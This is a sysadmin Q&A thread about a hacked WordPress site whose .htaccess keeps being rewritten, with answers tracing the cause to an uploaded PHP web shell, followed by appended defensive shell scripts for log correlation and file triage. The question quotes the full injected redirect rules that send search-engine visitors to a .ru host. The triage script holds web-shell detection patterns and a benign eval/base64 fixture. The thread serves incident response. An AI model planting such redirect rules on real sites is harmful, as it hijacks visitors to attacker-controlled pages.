1

I'm stumped. My client's WordPress site keeps having its .htaccess file hacked. It's adding code to redirect all traffic from search engines to different sites. It keeps changing the domain it's redirecting to. Currently it is redirecting to prime-vermond.ru (don't visit this site!).

I have changed FTP passwords and WordPress admin passwords, updated all plugins, removed unused plugins, and changed the file permissions of the .htaccess file to 444.

I'm thinking it might be a server exploit? The client's site is hosted with GoDaddy. I have emailed them several times and am waiting for a response on my latest support ticket.

I have searched all files looking for anything that might contain malicious code but came up with nothing. I'm assuming they have the code base64-encoded and are using eval to run it.

Any ideas on how to better find a modified bad file? I'm at a loss now =/

Below is the entire code being added to the .htaccess file:

```apacheconf
ErrorDocument 400 http://prime-vermond.ru/trast/index.php
ErrorDocument 401 http://prime-vermond.ru/trast/index.php
ErrorDocument 403 http://prime-vermond.ru/trast/index.php
ErrorDocument 404 http://prime-vermond.ru/trast/index.php
ErrorDocument 500 http://prime-vermond.ru/trast/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]
```
Clint Chaney
  • possible duplicate of [My server's been hacked EMERGENCY](http://serverfault.com/questions/218005/my-servers-been-hacked-emergency) – John Gardeniers Sep 29 '11 at 03:43

3 Answers

4

Either your application code is being exploited or someone has phished/guessed your account credentials. Make sure your wp code is up to date, including any plugins, and make sure you change your account password.

EEAA
  • Thanks. I updated the Authentication Unique Keys and Salts but still a no go =/ Plugins are up to date but it is an older version of WordPress. Upgrading would break the layout so my client didn't want to upgrade. Should I force the upgrade? – Clint Chaney Sep 29 '11 at 02:41
  • 2
    @ClintChaney [Yes, upgrade.](http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress) – Shane Madden Sep 29 '11 at 02:47
  • 3
    "so my client didn't want to upgrade" -- famous last words, my friend. :) By using WordPress (one of the most widely-deployed and most frequently exploited CMSes out there) you're committing yourself to staying as up-to-date as humanly possible, installing updates within days if not hours of when they come out. – EEAA Sep 29 '11 at 02:56
  • Yeah, I tried explaining that =/ Hopefully they won't still refuse. Thanks! – Clint Chaney Sep 29 '11 at 03:03
  • Well unfortunately it's still happening =/ even after upgrades – Clint Chaney Sep 29 '11 at 03:21
  • 1
    You need to completely wipe your entire DocumentRoot. Empty, as in zero files left. Then re-deploy from a known-good backup. – EEAA Sep 29 '11 at 03:24
  • Found the bad files. This was the comment in the main file: # Web Shell by oRb – Clint Chaney Sep 29 '11 at 04:15
2

Set all possible logging options on. Wait for it to happen again. Then note the last modified time on the file and then check the access/error logs to see if anything unusual was going on at that time.

David Schwartz
  • Thanks David I'll give that a try. I enabled web logs on her server earlier. Just have to wait for them to be generated. – Clint Chaney Sep 29 '11 at 02:45
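The correlation step David describes, as an added shell example that is not part of the answer: it reads the modification time of the tampered file and prints the access-log lines from a window around that moment. The log lines, client IPs and file names are constructed for the demo; it assumes GNU or BSD stat/date, the Apache common/combined log format, and that TZ names the timezone the log timestamps are written in (UTC here).

```shell
#!/bin/sh
# Added example: correlate a tampered file's mtime with Apache access log lines.
# Assumption: TZ matches the offset used in the log (the sample log is +0000).
export TZ=UTC

# Epoch mtime of a file (GNU stat first, BSD stat as fallback).
file_mtime() {
    stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"
}

# Format an epoch as "YYYY-MM-DD HH:MM:SS" (GNU date first, BSD date as fallback).
fmt_epoch() {
    date -d "@$1" '+%Y-%m-%d %H:%M:%S' 2>/dev/null || date -r "$1" '+%Y-%m-%d %H:%M:%S'
}

# Print log lines whose timestamp lies within +/- WINDOW seconds (default 300)
# of the file's mtime. Log timestamps look like [29/Sep/2011:03:20:11 +0000];
# awk rewrites them to the same sortable form and compares them as strings.
requests_around_mtime() {
    file=$1; log=$2; window=${3:-300}
    mtime=$(file_mtime "$file")
    lo=$(fmt_epoch $((mtime - window)))
    hi=$(fmt_epoch $((mtime + window)))
    awk -v lo="$lo" -v hi="$hi" '
        BEGIN { split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", m, " ")
                for (i = 1; i <= 12; i++) mon[m[i]] = sprintf("%02d", i) }
        match($0, /\[[0-9]+\/[A-Za-z]+\/[0-9]+:[0-9:]+/) {
            ts = substr($0, RSTART + 1, RLENGTH - 1)   # 29/Sep/2011:03:20:11
            split(ts, p, /[\/:]/)                      # day, month, year, H, M, S
            key = p[3] "-" mon[p[2]] "-" p[1] " " p[4] ":" p[5] ":" p[6]
            if (key >= lo && key <= hi) print
        }' "$log"
}

# Constructed fixture: a .htaccess touched at 03:20:11 UTC and four log lines,
# two of which fall inside a five-minute window around that mtime. The PHP file
# under /images/stories/ mirrors the upload-directory location from the thread.
demo() {
    dir=$(mktemp -d)
    : > "$dir/.htaccess"
    touch -t 201109290320.11 "$dir/.htaccess"
    cat > "$dir/access.log" <<'EOF'
198.51.100.7 - - [29/Sep/2011:02:10:03 +0000] "GET /index.php HTTP/1.1" 200 8192 "http://www.google.com/" "Mozilla/5.0"
203.0.113.5 - - [29/Sep/2011:03:19:58 +0000] "POST /images/stories/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Sep/2011:03:20:09 +0000] "GET /images/stories/upload.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.9 - - [29/Sep/2011:03:40:00 +0000] "GET /about/ HTTP/1.1" 200 4096 "http://www.bing.com/" "Mozilla/5.0"
EOF
    requests_around_mtime "$dir/.htaccess" "$dir/access.log" 300
    rm -rf "$dir"
}

demo
```

On a real server, call `requests_around_mtime /path/to/.htaccess /var/log/apache2/access.log 300` right after noticing the change; the requests that hit a PHP file in an upload directory moments before the mtime are the ones to read first.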
0

I was having the same problem and this was our solution.

Background

There was a security hole in one of our CMS installations; in our case it was an alpha version of Joomla 1.6 used for testing that was left without care... it is irrelevant which alpha version it was; there is a released and much more secure version (1.7) now :P .

The hole was caused by the file/image uploading code. This part of the CMS didn't validate anything, so anybody could upload any kind of file (a PHP file in our case) and execute it externally by requesting the file.

The PHP file (in our case) was uploaded to the images directory, specifically the folder that all articles have upload access to; in our case and this particular installation it was domain.com/images/stories/.

This PHP code scanned for all Apache configuration files (.htaccess) and added the rules you describe above. The code jumped up one level at a time until it no longer had read or write access, adding this code to any .htaccess file it found at each level, or creating one if it didn't exist.

Even if you delete or replace the .htaccess files, they will be created or modified again (every hour in our case) by the PHP code being executed.

Solution

We started tracking down the files using their modification date, filtering by the most recently modified. We used the (recently modified) .htaccess files as breadcrumbs to find the source.

If you have shell access this is easier; otherwise check by the last modified folder, and you will find a .htaccess file inside every subfolder. You will basically end up with some PHP file(s) with a recent date and probably with executable permissions for public access (0606 or similar).

If you try to download this code, your antivirus will pop up with a warning; in our case Avira displayed a warning for Trojan - Backdoor PHP/C99shell.B, so don't bother.

But if you are that curious then change the extension to something else and/or zip it up to download it... or disable your antivirus for a second, but that's up to you.

Anyway, once you find this/these file(s), delete them and update your system, or uninstall it (as we did) if needed, to close the security hole.

Hope this helps someone! :D
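The file hunt asked for in the question and the breadcrumb method in this answer, combined into one added shell example that is not code from the thread, from WordPress or from Joomla. It lists recently changed .htaccess and PHP files, PHP files sitting under the upload directory (wp-content/uploads is the WordPress counterpart of the images/stories folder above), PHP files using eval with base64_decode or similar decoders or carrying the "Web Shell by" banner Clint found, and .htaccess files containing the injected ErrorDocument/RewriteRule redirect. It assumes a POSIX shell with find and grep -E and read access to the whole tree; the fixture tree, the redirect host redirect.invalid and the file names in it are constructed for the demo. Nothing is deleted; every hit is a candidate for manual review.

```shell
#!/bin/sh
# Added example: read-only triage of a web DocumentRoot for the artefacts
# described in the thread. Assumes POSIX find/grep -E; modifies nothing.

# 1. PHP and .htaccess files changed in the last N days (default 2). Pipe the
#    output to "xargs ls -lt" to order the breadcrumbs newest first.
recently_modified() {
    root=$1; days=${2:-2}
    find "$root" -type f -mtime "-$days" \( -name '*.php' -o -name '.htaccess' \) -print
}

# 2. PHP files where only uploads belong. A .php file under wp-content/uploads
#    (the WordPress counterpart of Joomla's images/stories) is almost always foreign.
php_in_uploads() {
    root=$1
    find "$root/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) -print 2>/dev/null
}

# 3. PHP files using the obfuscation primitives the question guesses at, or
#    carrying the banner reported in the comments. grep -l prints file names
#    only; legitimate plugins occasionally call base64_decode, so read each hit.
suspicious_php() {
    root=$1
    find "$root" -type f -name '*.php' \
        -exec grep -lE 'eval *\( *(base64_decode|gzinflate|gzuncompress|str_rot13)|Web Shell by' {} + 2>/dev/null
}

# 4. .htaccess files carrying the injected redirect: an ErrorDocument pointing
#    at an external URL, or a catch-all RewriteRule to an external host.
tampered_htaccess() {
    root=$1
    find "$root" -type f -name '.htaccess' \
        -exec grep -lE '^ErrorDocument [0-9]{3} https?://|^RewriteRule \^\(\.\*\)\$ https?://' {} + 2>/dev/null
}

# Constructed fixture tree so the script runs offline; none of this is real site
# content. The .php under uploads only decodes to "echo 1;" and the redirect
# host uses the reserved .invalid TLD.
build_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2011/09" "$root/wp-content/plugins/ok"
    printf '<?php echo "hello"; ?>\n' > "$root/index.php"
    printf '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n' \
        > "$root/wp-content/uploads/2011/09/img.php"
    printf 'not really a jpeg\n' > "$root/wp-content/uploads/2011/09/photo.jpg"
    printf 'ErrorDocument 404 http://redirect.invalid/trast/index.php\nRewriteRule ^(.*)$ http://redirect.invalid/trast/index.php [R=301,L]\n' \
        > "$root/wp-content/uploads/.htaccess"
    printf '# BEGIN WordPress\nRewriteEngine On\n# END WordPress\n' > "$root/.htaccess"
    echo "$root"
}

# Run all four checks against one DocumentRoot and print the hits per check.
run_triage() {
    root=$1
    echo "== recently modified"; recently_modified "$root" 2
    echo "== php under uploads"; php_in_uploads "$root"
    echo "== suspicious php"; suspicious_php "$root"
    echo "== tampered .htaccess"; tampered_htaccess "$root"
}

fixture=$(build_fixture)
run_triage "$fixture"
rm -rf "$fixture"
```

Against a real site, replace the fixture with `run_triage /var/www/html` (or wherever the DocumentRoot lives) and start with the files that appear in more than one list: a PHP file under uploads that is both recently modified and flagged by the eval check is the one to read, and the .htaccess hits show how far up the tree the injection reached.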